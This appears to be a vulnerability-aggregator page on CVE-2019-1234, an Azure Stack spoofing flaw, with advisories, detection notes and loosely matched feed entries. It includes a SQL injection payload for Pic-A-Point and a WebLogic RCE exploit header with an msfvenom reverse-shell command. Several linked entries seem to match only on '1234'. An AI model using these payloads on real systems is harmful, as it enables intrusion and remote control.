CVE-2019-1234
published 2019-11-12CVE-2019-1234: A spoofing vulnerability exists when Azure Stack fails to validate certain requests, aka 'Azure Stack Spoofing Vulnerability'.
PriorityP357high7.5CVSS 3.1
AVNACLPRNUINSUCNIHAN
EPSS
57.94%
99.0th percentile
A spoofing vulnerability exists when Azure Stack fails to validate certain requests, aka 'Azure Stack Spoofing Vulnerability'.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | azure_stack | — | — |
| msrc | azure_stack | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Attacker sends a specially crafted request to the Azure Stack user portal to exploit the spoofing vulnerability ↗
- →Monitor for unauthenticated HTTP requests to the VirtualMachineScreenshot API route on the DataService of AzS-XRP01, which can be used to capture screenshots of tenant and infrastructure VMs ↗
- ·Exploit status is publicly disclosed: No; Exploited: No; rated Exploitation Less Likely for both latest and older software releases at time of advisory ↗
CVSS provenance
nvdv3.17.5HIGHCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:N/I:P/A:N
vendor_msrc7.5HIGH
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Microsoft
Azure Stack Spoofing Vulnerability
vendor_msrc·2019-11-12·CVSS 7.5
CVE-2019-1234 [HIGH] Azure Stack Spoofing Vulnerability
Azure Stack Spoofing Vulnerability
Description: A spoofing vulnerability exists when Azure Stack fails to validate certain requests. An attacker who successfully exploited the vulnerability could make requests to internal Azure Stack resources.
An attacker could exploit the vulnerability by sending a specially crafted request to the Azure Stack user portal.
The update addresses the vulnerability by changing how Azure Stack handles certain requests.
Azure Stack: Azure Stack
Impact: Spoofing
Exploit Status: Publicly Disclosed:No;Exploited:No;Latest Software Release:Exploitation Less Likely;Older Software Release:Exploitation Less Likely
Remediation: Release Notes
Reference: https://docs.microsoft.com/en-us/azure-stack/operator/release-notes-security-updates?view=azs-1910
GHSA
GHSA-jw56-f5mh-fpcf: A spoofing vulnerability exists when Azure Stack fails to validate certain requests, aka 'Azure Stack Spoofing Vulnerability'
ghsa_unreviewed·2022-05-24
CVE-2019-1234 [MEDIUM] GHSA-jw56-f5mh-fpcf: A spoofing vulnerability exists when Azure Stack fails to validate certain requests, aka 'Azure Stack Spoofing Vulnerability'
A spoofing vulnerability exists when Azure Stack fails to validate certain requests, aka 'Azure Stack Spoofing Vulnerability'.
No detection rules found.
Exploit-DB
citecodecrashers Pic-A-Point 1.1 - 'Consignment' SQL Injection
exploitdb·2019-09-26
citecodecrashers Pic-A-Point 1.1 - 'Consignment' SQL Injection
citecodecrashers Pic-A-Point 1.1 - 'Consignment' SQL Injection
---
# Exploit Title: citecodecrashers Pic-A-Point 1.1 - 'Consignment' SQL Injection
# Author: Cakes
# Discovery Date: 2019-09-26
# Vendor Homepage: https://github.com/citecodecrashers/Pic-A-Point
# Software Link: https://github.com/citecodecrashers/Pic-A-Point/archive/master.zip
# Tested Version: 1.1
# Tested on OS: CentOS 7
# CVE: N/A
# Discription:
# Simple SQL injection after application authentication.
# POST Request
# Parameter: Consignment (POST)
# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: Consignment=1234' AND 9752=(SELECT (CASE WHEN (9752=9752) THEN 9752 ELSE (SELECT 1018 UNION SELECT 3533) END))-- QBEy&Submit=Trace now
# Type: error-based
#
Exploit-DB
Oracle Weblogic 10.3.6.0.0 / 12.1.3.0.0 - Remote Code Execution
exploitdb·2019-04-30·CVSS 9.8
CVE-2019-2725 [CRITICAL] Oracle Weblogic 10.3.6.0.0 / 12.1.3.0.0 - Remote Code Execution
Oracle Weblogic 10.3.6.0.0 / 12.1.3.0.0 - Remote Code Execution
---
#!/usr/bin/python
# Exploit Title: Oracle Weblogic Exploit CVE-2019-2725
# Date: 30/04/2019
# Exploit Author: Avinash Kumar Thapa
# Vendor Homepage: https://www.oracle.com/middleware/technologies/weblogic.html
# Software Link: https://www.oracle.com/technetwork/middleware/downloads/index.html
# Version: Oracle WebLogic Server, versions 10.3.6.0.0, 12.1.3.0.0
# Tested on:
#OS: Windows 2012 R2 (Build 9600).
#Architecture : x64
#System Language : en_US
# CVE : CVE-2019-2725
# Script Usage:
# python exploit.py http://IP:PORT/_async/AsyncResponseServiceHttps
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=1234 -f psh-cmd > exploit.ps1
# Add the powershell command in the variable
__author__ = "Avinash K
Checkpoint
Remote Cloud Execution – Critical Vulnerabilities in Azure Cloud Infrastructure (Part I)
blogs_checkpoint·2020-01-30
CVE-2019-1234 Remote Cloud Execution – Critical Vulnerabilities in Azure Cloud Infrastructure (Part I)
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
AI Research 2
Android Malware 23
Artificial Intelligence 4
ChatGPT 3
Check Point Research Publications 455
Cloud Security 1
CPRadio 44
Crypto 2
Data & Threat Intelligence 2
Data Analysis 0
Demos 22
Global Cyber Attack Reports 408
How To Guides 13
Ransomware 5
Russo-Ukrainian War 1
Security Report 1
Threat and data analysis 0
Threat Research 174
Web 3.0 Security 11
Wipers 0
## Remote Cloud Execution – Critical Vulnerabilities in Azure Cloud Infrastructure (Part I)
## Ronen Shustin
## Cloud Attack Part I
## Motivation
Cloud security is like voodoo. Clients
Talos
Microsoft Patch Tuesday — Nov. 2019: Vulnerability disclosures and Snort coverage
blogs_talos·2019-11-12·CVSS 9.1
[CRITICAL] Microsoft Patch Tuesday — Nov. 2019: Vulnerability disclosures and Snort coverage
By Jon Munshaw.
Microsoft released its monthly security update today, disclosing a variety of vulnerabilities in several of its products. The latest Patch Tuesday discloses 75 vulnerabilities, 13 of which are considered "critical," with the rest being deemed "important."
This month’s security update covers security issues in a variety of Microsoft services and software, including the Scripting Engine, the Windows Hyper-V hypervisor, and Win32. Cisco Talos discovered one of these vulnerabilities, CVE-2019-1448 —a remote code execution vulnerability in Microsoft Excel. For more on this bug, read our full Vulnerability Spotlight here. We are also disclosing a remote code execution vulnerability in Microsoft Media Foundation.
Talos also released a new set of SNORTⓇ rules that provide covera
Talos
Microsoft Patch Tuesday — Nov. 2019: Vulnerability disclosures and Snort coverage
blogs_talos·2019-11-12·CVSS 9.1
[CRITICAL] Microsoft Patch Tuesday — Nov. 2019: Vulnerability disclosures and Snort coverage
## Microsoft Patch Tuesday — Nov. 2019: Vulnerability disclosures and Snort coverage
By Jon Munshaw.
Microsoft released its monthly security update today, disclosing a variety of vulnerabilities in several of its products. The latest Patch Tuesday discloses 75 vulnerabilities, 13 of which are considered "critical," with the rest being deemed "important."
This month’s security update covers security issues in a variety of Microsoft services and software, including the Scripting Engine, the Windows Hyper-V hypervisor, and Win32. Cisco Talos discovered one of these vulnerabilities, CVE-2019-1448 —a remote code execution vulnerability in Microsoft Excel. For more on this bug, read our full Vulnerability Spotlight here . We are also disclosing a remote code execution vulnerability in Microso
Bugzilla
CVE-2019-7837 flash-plugin: Arbitrary Code Execution vulnerability (APSB19-26)
bugzilla·2019-05-14·CVSS 8.8
CVE-2019-7837 [HIGH] CVE-2019-7837 flash-plugin: Arbitrary Code Execution vulnerability (APSB19-26)
CVE-2019-7837 flash-plugin: Arbitrary Code Execution vulnerability (APSB19-26)
Adobe Security Bulletin APSB19-26 for Adobe Flash Player describes a flaw that can possibly lead to arbitrary code execution when Flash Player is used to play a specially crafted SWF file:
Use After Free -- CVE-2019-7837
External References:
https://helpx.adobe.com/security/products/flash-player/apsb19-26.html
Discussion:
This issue has been addressed in the following products:
Red Hat Enterprise Linux 6 Supplementary
Via RHSA-2019:1234 https://access.redhat.com/errata/RHSA-2019:1234
Bugzilla
CVE-2019-10136 spacewalk: Insecure computation of authentication signatures during user authentication
bugzilla·2019-05-10·CVSS 4.3
CVE-2019-10136 [MEDIUM] CVE-2019-10136 spacewalk: Insecure computation of authentication signatures during user authentication
CVE-2019-10136 spacewalk: Insecure computation of authentication signatures during user authentication
During user authentication, the hash input does not contain any length fields or field boundaries, so that the same hashes are computed e.g. for {server-time=1234, expire-offset=567} (end date 1801) and {server-time=1, expire-offset=234567} (end date 234568).
An attacker could use this flaw to reuse an expired token, and extend its expiry date.
Discussion:
Acknowledgments:
Name: Malte Kraus (SUSE)
---
in server/apacheAuth.py :
139 def auth_client():
[...]
165 clientId = token['x-rhn-server-id']
166 username = token['x-rhn-auth-user-id']
167 signature = token['x-rhn-auth']
168 rhnServerTime = token['x-rhn-auth-server-time']
169 expireOffset = token['x-rhn-auth-expire-offset']
170
17
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1234https://research.checkpoint.com/2020/remote-cloud-execution-critical-vulnerabilities-in-azure-cloud-infrastructure-part-i/https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1234https://research.checkpoint.com/2020/remote-cloud-execution-critical-vulnerabilities-in-azure-cloud-infrastructure-part-i/
2019-11-12
Published